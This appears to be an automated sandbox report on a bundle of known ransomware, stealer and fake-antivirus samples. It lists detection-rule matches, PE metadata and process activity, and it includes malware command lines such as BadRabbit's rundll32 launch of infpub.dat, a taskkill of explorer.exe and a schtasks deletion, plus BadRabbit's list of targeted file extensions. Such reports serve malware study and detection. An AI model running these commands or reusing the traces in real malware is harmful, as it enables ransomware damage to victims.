          Source: 16.2.Endermanch@Cerber5.exe.1520000.1.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 15.3.rundll32.exe.3454210.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 11.0.Endermanch@BadRabbit.exe.80000.3.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 11.0.Endermanch@BadRabbit.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.3.rundll32.exe.3454210.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 15.2.rundll32.exe.3454210.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 15.3.rundll32.exe.3454210.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 40.0.3F22.tmp.7ff730b90000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 40.0.3F22.tmp.7ff730b90000.1.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 15.3.rundll32.exe.3454210.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 46.0.Endermanch@InfinityCrypt.exe.3131cc.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 15.2.rundll32.exe.33d6490.1.raw.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.2.rundll32.exe.33d6490.1.raw.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.3.rundll32.exe.3454210.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 40.2.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 40.2.3F22.tmp.7ff730b90000.0.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 15.2.rundll32.exe.33d6490.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.2.rundll32.exe.33d6490.1.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 16.2.Endermanch@Cerber5.exe.4e50000.2.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 16.2.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 15.3.rundll32.exe.3454210.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: 11.0.Endermanch@BadRabbit.exe.80000.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.2.rundll32.exe.3340000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.2.rundll32.exe.3340000.0.unpack, type: UNPACKEDPEMatched rule: NotPetya_Ransomware_Jun17 date = 2017-06-27, hash3 = 64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1, hash2 = 45ef8d53a5a2011e615f60b058768c44c74e5190fefd790ca95cf035d9e1d5e0, hash1 = 027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745, author = Florian Roth, description = Detects new NotPetya Ransomware variant from June 2017, reference = https://goo.gl/h6iaGj, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 11.2.Endermanch@BadRabbit.exe.f1fa80.1.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 16.2.Endermanch@Cerber5.exe.4e50000.2.raw.unpack, type: UNPACKEDPEMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 11.2.Endermanch@BadRabbit.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 16.0.Endermanch@Cerber5.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 16.0.Endermanch@Cerber5.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 46.0.Endermanch@InfinityCrypt.exe.310000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: 40.0.3F22.tmp.7ff730b90000.2.unpack, type: UNPACKEDPEMatched rule: BadRabbit_Mimikatz_Comp date = 2017-10-25, hash1 = 2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035, author = Florian Roth, description = Auto-generated rule, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 40.0.3F22.tmp.7ff730b90000.2.unpack, type: UNPACKEDPEMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 16.0.Endermanch@Cerber5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 16.0.Endermanch@Cerber5.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000010.00000000.472305504.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000028.00000002.509874585.00007FF730B9E000.00000004.00000001.01000000.0000001F.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: 00000010.00000000.476993262.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000010.00000002.571550641.0000000001520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 00000028.00000000.495939714.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000028.00000000.495419443.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000010.00000002.594076682.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 00000010.00000000.470696934.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: 00000010.00000002.548613224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Cerber author = kevoreilly, description = Cerber Payload, cape_type = Cerber Payload
          Source: 00000028.00000000.502691243.00007FF730B9E000.00000008.00000001.01000000.0000001F.sdmp, type: MEMORYMatched rule: mimikatz author = Benjamin DELPY (gentilkiwi), description = mimikatz, tool_author = Benjamin DELPY (gentilkiwi)
          Source: 00000010.00000000.474988219.0000000000448000.00000020.00000001.01000000.00000014.sdmp, type: MEMORYMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: Process Memory Space: rundll32.exe PID: 4720, type: MEMORYSTRMatched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
          Source: C:\Windows\cscc.dat, type: DROPPEDMatched rule: INDICATOR_TOOL_ENC_DiskCryptor author = ditekSHen, description = Detect DiskCryptor open encryption solution that offers encryption of all disk partitions
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Windows\dispci.exe, type: DROPPEDMatched rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 date = 2017-10-24, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Christiaan Beek, description = Bad Rabbit Ransomware, source = https://pastebin.com/Y7pJv3tK, reference = BadRabbit
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exe, type: DROPPEDMatched rule: cerber3 date = 2016-09-09, author = pekeinfo, description = Cerber3
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exe, type: DROPPEDMatched rule: MALWARE_Win_InfinityLock author = ditekSHen, description = Detects InfinityLock ransomware
          Source: C:\Users\user\Desktop\Fantom.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Petya_Ransomware date = 2016-03-24, author = Florian Roth, description = Detects Petya Ransomware, reference = http://www.heise.de/newsticker/meldung/Erpressungs-Trojaner-Petya-riegelt-den-gesamten-Rechner-ab-3150917.html, hash = 26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739
          Source: C:\Users\user\Desktop\Endermanch@Petya.A.exe, type: DROPPEDMatched rule: Ransom_Petya author = CCN-CERT, description = Regla para detectar Ransom.Petya con md5 AF2379CC4D607A45AC44D62135FB7015, version = 1.0
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exe, type: DROPPEDMatched rule: BadRabbit_Gen date = 2017-10-25, hash3 = 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da, hash2 = 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648, hash1 = 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, author = Florian Roth, description = Detects BadRabbit Ransomware, reference = https://pastebin.com/Y7pJv3tK, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
          Source: C:\Users\user\Desktop\Endermanch@WannaCrypt0r.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile deleted: C:\Windows\__tmp_rar_sfx_access_check_17962203Jump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\__tmp_rar_sfx_access_check_17962203Jump to behavior
          Source: C:\Windows\302746537.exeCode function: 7_2_00407E1A sprintf,GetPropA,HeapFree,HeapFree,HeapFree,RemovePropA,CallWindowProcA,NtdllDefWindowProc_A,7_2_00407E1A
          Source: C:\Windows\302746537.exeCode function: 7_2_00404714 GetWindowLongA,CallWindowProcA,RemovePropA,RemovePropA,RemovePropA,RevokeDragDrop,SetWindowLongA,NtdllDefWindowProc_A,7_2_00404714
          Source: C:\Windows\302746537.exeCode function: 7_2_00405B1F GetPropA,DefFrameProcA,SetLastError,NtdllDefWindowProc_A,7_2_00405B1F
          Source: Endermanch@WannaCrypt0r.exe.0.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Resource name: RT_RCDATA type: COM executable for DOS
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Resource name: RT_DIALOG type: DOS executable (COM, 0x8C-variant)
          Source: Endermanch@PolyRansom.exe.0.drStatic PE information: No import functions for PE file found
          Source: Endermanch@ViraLock.exe.0.drStatic PE information: No import functions for PE file found
          Source: 4d44bed6.exe, 00000000.00000000.301197402.000001D6D1938000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamed.exe$ vs 4d44bed6.exe
          Source: C:\Windows\SysWOW64\wevtutil.exeProcess token adjusted: Security
          Source: 4d44bed6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@NoMoreRansom.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@AntivirusPro2017.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@HappyAntivirus.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@Movie.mpeg.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: Fantom.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9916272410358565
          Source: Endermanch@Xyeta.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942863805970149
          Source: Endermanch@InternetSecurityGuard.exe.0.drStatic PE information: Section: .rdata ZLIB complexity 1.0416666666666667
          Source: Endermanch@SecurityCentral.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9893345463538722
          Source: Endermanch@SecurityDefender.exe.0.drStatic PE information: Section: .data ZLIB complexity 0.9999101413973384
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005126953125
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.0005296610169492
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: ZLIB complexity 1.021484375
          Source: Endermanch@SecurityScanner.exe.0.drStatic PE information: Section: .rsrc ZLIB complexity 0.9944190347101134
          Source: Endermanch@VAV2008.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9890534156976745
          Source: 4d44bed6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\antivirus-platinum.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: C:\Users\user\Desktop\4d44bed6.exeFile created: C:\Users\user\Desktop\BadRabbit.zipJump to behavior
          Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@133/102@114/100
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeCode function: 5_2_004096AF GetModuleHandleA,FindResourceA,5_2_004096AF
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009
          Source: rundll32.exe, 0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" "
          Source: 4d44bed6.exeReversingLabs: Detection: 76%
          Source: 4d44bed6.exeVirustotal: Detection: 41%
          Source: 4d44bed6.exeMetadefender: Detection: 25%
          Source: C:\Users\user\Desktop\4d44bed6.exeFile read: C:\Users\user\Desktop\4d44bed6.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\4d44bed6.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\4d44bed6.exe "C:\Users\user\Desktop\4d44bed6.exe"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\4d44bed6.exe "C:\Users\user\Desktop\4d44bed6.exe"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Antivirus.exe "C:\Users\user\Desktop\Endermanch@Antivirus.exe"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe "C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe "C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exe"
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess created: C:\Windows\302746537.exe "C:\WINDOWS\302746537.exe"
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe "C:\Users\user\Desktop\Endermanch@AnViPC2009.exe"
          Source: C:\Windows\302746537.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ECFB.tmp\302746537.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@BadRabbit.exe "C:\Users\user\Desktop\Endermanch@BadRabbit.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\comctl32.ocx
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Birele.exe "C:\Users\user\Desktop\Endermanch@Birele.exe"
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Endermanch@BadRabbit.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
          Source: C:\Users\user\Desktop\4d44bed6.exeProcess created: C:\Users\user\Desktop\Endermanch@Cerber5.exe "C:\Users\user\Desktop\Endermanch@Cerber5.exe"
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM explorer.exe
          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s c:\windows\mscomctl.ocx
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c schtasks /Delete /F /TN rhaegal
